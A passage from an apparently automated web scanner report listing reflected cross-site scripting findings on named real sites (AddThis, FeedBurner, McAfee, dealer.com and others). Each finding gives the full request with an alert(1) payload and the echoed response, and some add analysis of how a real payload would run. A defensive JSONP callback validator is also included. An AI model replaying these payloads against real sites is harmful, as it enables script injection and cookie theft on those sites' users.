The value of the callback request parameter is used, unvalidated, as the JSONP callback name that opens the text/javascript response, so it is emitted as raw JavaScript in front of the JSON argument. The payload ad9dc<script>alert(1)</script>c211f103512 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The scanner's "plain text between tags" wording is generic: the response is a script, so a <script> tag in the callback is a syntax error rather than executable HTML, while any JavaScript expression placed there runs directly. A callback name cannot be made safe by output encoding because it must be emitted as an identifier; the fix is to reject any value that is not a dotted chain of identifiers. The Referer shows the consumer is an addthis.com frame (s7.addthis.com/static/r07/sh39.html), so injected code would run in that origin.

Request

GET /red/psi/sites/www.staysafeonline.org/p.json?callback=_ate.ad.hprad9dc<script>alert(1)</script>c211f103512&uid=4d97b40ad252fd37&url=http%3A%2F%2Fwww.staysafeonline.org%2Fcontact&ref=http%3A%2F%2Fwww.staysafeonline.org%2F&xls06r HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=1302905826.1FE|1302905826.60|1302905826.66; dt=X; psc=4; uid=4d97b40ad252fd37

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 451
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 17 Apr 2011 12:53:49 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 17 May 2011 12:53:49 GMT; Path=/
Set-Cookie: di=%7B%7D..1303044829.1FE|1303044829.60|1303044829.66; Domain=.addthis.com; Expires=Tue, 16-Apr-2013 12:53:48 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 17 Apr 2011 12:53:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 17 Apr 2011 12:53:49 GMT
Connection: close

_ate.ad.hprad9dc<script>alert(1)</script>c211f103512({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4d97b40ad252fd37","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d97b40ad252fd37&curl=http%3a%2f%2fwww.staysaf
...[SNIP]...

4.33. http://ds.addthis.com/red/psi/sites/www.webroot.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.webroot.com/p.json

Issue detail

The value of the callback request parameter is used, unvalidated, as the JSONP callback name that opens the text/javascript response, the same sink as 4.32 on a different site path. The payload 41b69<script>alert(1)</script>b9cd18d7e21 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. As in 4.32, the context is JavaScript code rather than HTML text, so the practical payload is a JavaScript expression in the callback name, and the remedy is strict validation of that name rather than encoding.

Request

GET /red/psi/sites/www.webroot.com/p.json?callback=_ate.ad.hpr41b69<script>alert(1)</script>b9cd18d7e21&uid=4d97b40ad252fd37&url=http%3A%2F%2Fwww.webroot.com%2FEn_US%2Fbusiness-antispyware-ce.html&ref=http%3A%2F%2Fburp%2Fshow%2F26&1vvglw8 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%7D..1303044828.1FE|1303044828.60|1303044865.66; dt=X; psc=4; uid=4d97b40ad252fd37

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 17 Apr 2011 13:20:04 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 17 May 2011 13:20:04 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 17 Apr 2011 13:20:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 17 Apr 2011 13:20:04 GMT
Connection: close

_ate.ad.hpr41b69<script>alert(1)</script>b9cd18d7e21({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})
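Both p.json findings (4.32 and 4.33) reflect the callback parameter as the function name that opens a text/javascript response. The following is an added example, not AddThis code, of the check such an endpoint needs: accept only a dotted chain of JavaScript identifiers, reject everything else with a 400, and render the accepted case with a JSON-encoded argument and headers that keep the body from being reinterpreted as HTML. The names isValidCallback, renderJsonp, invokeJsonp and jsonpDemo are chosen here, and the sample data is modelled on the captured response. The invokeJsonp helper executes the rendered body against a stub object built from the callback's dotted path, the same thing a consumer page does when it loads the script.

```javascript
// Added example, not AddThis code: validating a JSONP callback name before
// emitting it as the function identifier at the head of a text/javascript
// response, as p.json does with the callback parameter.

// A callback is accepted only as a dotted chain of JavaScript identifiers
// (the legitimate value in the report is _ate.ad.hpr). There is no output
// encoding that turns an arbitrary string into a safe identifier, so
// anything else is rejected outright.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;
const MAX_CALLBACK_LEN = 64;

function isValidCallback(name) {
  return typeof name === 'string'
    && name.length <= MAX_CALLBACK_LEN
    && CALLBACK_RE.test(name);
}

// Render the JSONP response. JSON.stringify makes the argument safe; the
// two Unicode line separators are escaped because JSON allows them raw
// but older JavaScript parsers reject them inside a literal. nosniff stops
// a browser from reinterpreting the script body as HTML, and the leading
// /**/ is a common habit that fixes the first bytes of the response
// regardless of the callback.
function renderJsonp(callback, data) {
  if (!isValidCallback(callback)) {
    return { status: 400, headers: { 'Content-Type': 'text/plain' }, body: 'invalid callback' };
  }
  const json = JSON.stringify(data)
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  return {
    status: 200,
    headers: {
      'Content-Type': 'text/javascript; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
    },
    body: `/**/${callback}(${json});`,
  };
}

// Execute a JSONP body as a consumer page would: build the dotted object
// path the callback names, point its leaf at a capture function, and run
// the script. Returns the data the callback received.
function invokeJsonp(body, callback) {
  const parts = callback.split('.');
  let received;
  let node = (data) => { received = data; };
  for (let i = parts.length - 1; i >= 1; i--) node = { [parts[i]]: node };
  new Function(parts[0], body)(node);
  return received;
}

// Constructed inputs modelled on the report's request and response.
const GOOD_CALLBACK = '_ate.ad.hpr';
const BAD_CALLBACK = '_ate.ad.hprad9dc<script>alert(1)</script>c211f103512';
const SAMPLE_DATA = { urls: [], segments: [], loc: 'MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg==' };

function jsonpDemo() {
  const ok = renderJsonp(GOOD_CALLBACK, SAMPLE_DATA);
  const rejected = renderJsonp(BAD_CALLBACK, SAMPLE_DATA);
  return {
    okStatus: ok.status,
    okBody: ok.body,
    roundTrip: invokeJsonp(ok.body, GOOD_CALLBACK),
    rejectedStatus: rejected.status,
    rejectedBodyHasScript: rejected.body.includes('<script>'),
  };
}
```

jsonpDemo() returns a 200 whose body begins /**/_ate.ad.hpr( and whose argument round-trips through invokeJsonp unchanged, and a 400 for the report's payload with no trace of it in the response. A length cap is included because identifier syntax alone would still let a caller pad the response with kilobytes of name.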

4.34. http://event.adxpose.com/event.flow [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into a double-quoted JavaScript string, the argument of the __ADXPOSE_DRAIN_QUEUE__(...) call in a text/javascript response. The payload 9776c<script>alert(1)</script>af634ea0b3b was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The <script> canary is inert inside a JavaScript string; the practical injection is a double quote that closes the string, after which the code runs in the origin of the ad frame that loads event.flow (a doubleclick.net frame, per the Referer).

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.martindale.com%2Fall%2Fc-england%2Fall-lawyers-3.htm%3Fc%3DN&uid=ZC45X9Axu6NOUFfX_3216119776c<script>alert(1)</script>af634ea0b3b&xy=0%2C0&wh=160%2C600&vchannel=76289&cid=151354&iad=1302961744905-1937990565784275&cookieenabled=1&screenwh=1920%2C1200&adwh=160%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper;sz=160x600;ord=3737712935544550400?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=f316e322-42df-4ab5-ad2c-53028d5d34aa

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=ABA01A6D8C5302184EC9B5B48A58FCC8; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 145
Date: Sat, 16 Apr 2011 13:49:37 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_3216119776c<script>alert(1)</script>af634ea0b3b");

4.35. http://feeds.feedburner.com/~s/hadash-hot [i parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.feedburner.com
Path:   /~s/hadash-hot

Issue detail

The value of the i request parameter is copied into a JavaScript string which is encapsulated in double quotation marks: the argument of the escape() call that builds feedSrc, which document.write then turns into a <script src> URL. The payload ba601"%3balert(1)//a740d68a772 was submitted in the i parameter. This input was echoed as ba601";alert(1)//a740d68a772 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The response carries X-Content-Type-Options: nosniff and X-XSS-Protection: 1; mode=block, but neither helps here: the browser XSS filter acts on HTML documents, not on a script resource included by another page, and nosniff only stops the script from being reinterpreted as HTML. The // at the end of the payload comments out the remainder of the statement so the script still parses.

Request

GET /~s/hadash-hot?i=http://www.hadash-hot.co.il/login.php?return=/submit.php?69123ba601"%3balert(1)//a740d68a772 HTTP/1.1
Host: feeds.feedburner.com
Proxy-Connection: keep-alive
Referer: http://www.hadash-hot.co.il/login.php?return=/submit.php?69123%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Efab6770260=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=UTF-8
Date: Sun, 17 Apr 2011 14:35:06 GMT
Expires: Sun, 17 Apr 2011 14:35:06 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 743

var fStartPost=1;if(window.feedburner_currPost!=null){window.feedburner_currPost++}else{window.feedburner_currPost=1}if(document.body.getAttribute("fStartPost")){fs=parseInt(document.body.getAttribute
...[SNIP]...
ner_startPostOverride=fStartPost}if(window.feedburner_currPost==fStartPost){feedSrc='http://feeds.feedburner.com/~s/hadash-hot?i='+escape("http://www.hadash-hot.co.il/login.php?return=/submit.php?69123ba601";alert(1)//a740d68a772")+'&showad=true';document.write('<script src="'+feedSrc+'" type="text/javascript">
...[SNIP]...

4.36. http://googlev8.dealer.com/smgmap.htm [locale parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://googlev8.dealer.com
Path:   /smgmap.htm

Issue detail

The value of the locale request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks: the class attribute of <body>. The payload 230ed"><script>alert(1)</script>8066f9184f8 was submitted in the locale parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smgmap.htm?accountId=automastermercedesbenz&locale=en_US230ed"><script>alert(1)</script>8066f9184f8 HTTP/1.1
Host: googlev8.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/dealership/about.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:16:00 GMT
Connection: close
Set-Cookie: ssoid=5f5015bb0a0a0003004764a11aea3255;path=/;domain=.dealer.com
Set-Cookie: ddcpoolid=CmsPoolGoogleV8;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 2962

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms19.dealer.ddc p7072 -->

   <title>Google Maps</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859
...[SNIP]...
<body class="honda enUS230ed"><script>alert(1)</script>8066f9184f8">
...[SNIP]...

4.37. http://googlev8.dealer.com/smgmap.htm [locale parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://googlev8.dealer.com
Path:   /smgmap.htm

Issue detail

The value of the locale request parameter is copied into a JavaScript string which is encapsulated in single quotation marks: the DDC.locale assignment in an inline script, a second reflection point for the same parameter as 4.36. The payload 1b9af'%3balert(1)//722916ad0cd was submitted in the locale parameter. This input was echoed as 1b9af';alert(1)//722916ad0cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smgmap.htm?accountId=automastermercedesbenz&locale=en_US1b9af'%3balert(1)//722916ad0cd HTTP/1.1
Host: googlev8.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/dealership/about.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:16:00 GMT
Connection: close
Set-Cookie: ssoid=5f4fdeb00a0a00ed0114d7392b1ea276;path=/;domain=.dealer.com
Set-Cookie: ddcpoolid=CmsPoolGoogleV8;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 2932

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms18.dealer.ddc p7072 -->

   <title>Google Maps</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859
...[SNIP]...
<![CDATA[*/
   window.DDC = window.DDC || {};
   DDC.locale = DDC.locale || 'en_US1b9af';alert(1)//722916ad0cd';
/*]]>
...[SNIP]...

4.38. http://home.mcafee.com/root/campaign.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://home.mcafee.com
Path:   /root/campaign.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70676"%3balert(1)//845bc386871 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70676";alert(1)//845bc386871 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /root/campaign.aspx?cid=83831&70676"%3balert(1)//845bc386871=1 HTTP/1.1
Host: home.mcafee.com
Proxy-Connection: keep-alive
Referer: http://home.mcafee.com/downloads/free-virus-scan
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionInfo=AffiliateId=0; lBounceURL=http://home.mcafee.com/downloads/free-virus-scan; currentURL=http%3A//home.mcafee.com/downloads/free-virus-scan; isvt_visitor=yNo98QoBC2cAABJDQT4AAAAAAB1JCVeen0VKRW; WT_FPC=id=20dc5aca13b81baa15d1303034109486:lv=1303034109486:ss=1303034109486; session%5Fdata=%3cSessionData%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e0%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e0%3c%2fwt_destination_cid%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; SessionInfo=AffiliateId=0; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Locale=EN-US; HPrst=gu=122d9a9e-74f4-4d0e-85cf-3ecd0f120b8e&loc=EN-US; AffID=0-0; Currency=56; HRntm=aff=0-0&cur=56&lbu=http%3a%2f%2fhome.mcafee.com%2fdownloads%2ffree-virus-scan&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; s_cc=true; s_vi=[CS]v1|26D5719A051D00E9-600001368029DFAB[CE]; IS3_History=1302573891-1-74_3--1__3_; IS3_GSV=DPL-2_TES-1303044907_PCT-1303044907_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; FSRCookie=isAlive=1||ForeseeLoyalty=1; foresee.alive=1303045172416; s_nr=1303045173262-New; s_ev8=%5B%5B%27mcafee%27%2C%271303045173265%27%5D%5D; s_sq=mcafeecomglobal%3D%2526pid%253Dconsumer%25253Aen-us%25253Adirect-0-mcafee%25253Afree_services%25253Afreescan_scan_initiated%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bjavascript%25253Alocation.href%25253D%252522http%25253A//home.mcafee.com/root/campaign.aspx%25253Fcid%25253D83831%2526oidt%253D2%2526ot%253DSUBMIT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:55 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Wed, 17-Apr-2041 12:59:55 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: CampaignId=83831; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=83831; path=/
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e0%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e0%3c%2fwt_destination_cid%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:55 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=122d9a9e-74f4-4d0e-85cf-3ecd0f120b8e&loc=EN-US; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:55 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=83831&lbu=http%3a%2f%2fhome.mcafee.com%2fdownloads%2ffree-virus-scan&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
X-Powered-By: ASP.NET
MS: SJV7
X-UA-Compatible: IE=8
Date: Sun, 17 Apr 2011 12:59:54 GMT
Content-Length: 1254


<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>

</title></head>
<body>
<form name="form1" method="post" action="campaign.aspx?cid=83831&amp;70676%22%3balert(1)%2f%2f8
...[SNIP]...
<script type="text/javascript">
window.location.href = "http://liteapps.mcafee.com/apps/mss/download.asp?affid=0&large=1&cid=83831&70676";alert(1)//845bc386871=1";
</script>
...[SNIP]...

4.39. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload b6e35<script>alert(1)</script>73b5bcd535 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=I09839b6e35<script>alert(1)</script>73b5bcd535 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/za/additem?a5f9f=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 17 Apr 2011 14:24:11 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 18 Apr 2011 14:24:11 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:24:10 GMT
Content-Length: 127

/*
* JavaScript include error:
* The customer code "I09839B6E35<SCRIPT>ALERT(1)</SCRIPT>73B5BCD535" was not recognized.
*/

4.40. http://law.alltop.com/css/din-bold.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://law.alltop.com
Path:   /css/din-bold.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d0c7"><script>alert(1)</script>4acc94967d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css4d0c7"><script>alert(1)</script>4acc94967d7/din-bold.swf HTTP/1.1
Host: law.alltop.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; alltop_v=eb8e1238e83a994c827243f20aced46d; alltop_r=2; sifrFetch=true; __qca=P0-1457044879-1302961854448; __utmz=160012002.1302961854.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=160012002.1443153480.1302961854.1302961854.1302961854.1; __utmc=160012002; __utmb=160012002.2.9.1302961854546; __qseg=Q_D|Q_T|Q_2891|Q_2360|Q_2349|Q_2346|Q_2340|Q_1659|Q_1286|Q_1155|Q_1154|Q_1153|Q_1151|Q_1150|Q_1149|Q_1148|Q_1147|Q_1145|Q_983|Q_982

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 13:51:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Fri, 16-Apr-2010 13:51:36 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; path=/; domain=.alltop.com
Expires: Sat, 16 Apr 2011 14:51:36 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Mon, 15 Nov 2010 16:29:58 GMT
Set-Cookie: alltop_r=2; expires=Fri, 15-Jul-2011 13:51:36 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 930373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/css4d0c7"><script>alert(1)</script>4acc94967d7/din-bold.swf" method="post" accept-charset="utf-8">
...[SNIP]...

4.41. http://law.alltop.com/css/din-bold.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://law.alltop.com
Path:   /css/din-bold.swf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91506"><script>alert(1)</script>bc3da8f28a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/din-bold.swf91506"><script>alert(1)</script>bc3da8f28a0 HTTP/1.1
Host: law.alltop.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; alltop_v=eb8e1238e83a994c827243f20aced46d; alltop_r=2; sifrFetch=true; __qca=P0-1457044879-1302961854448; __utmz=160012002.1302961854.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=160012002.1443153480.1302961854.1302961854.1302961854.1; __utmc=160012002; __utmb=160012002.2.9.1302961854546; __qseg=Q_D|Q_T|Q_2891|Q_2360|Q_2349|Q_2346|Q_2340|Q_1659|Q_1286|Q_1155|Q_1154|Q_1153|Q_1151|Q_1150|Q_1149|Q_1148|Q_1147|Q_1145|Q_983|Q_982

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 13:51:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Fri, 16-Apr-2010 13:51:50 GMT; path=/; domain=.alltop.com
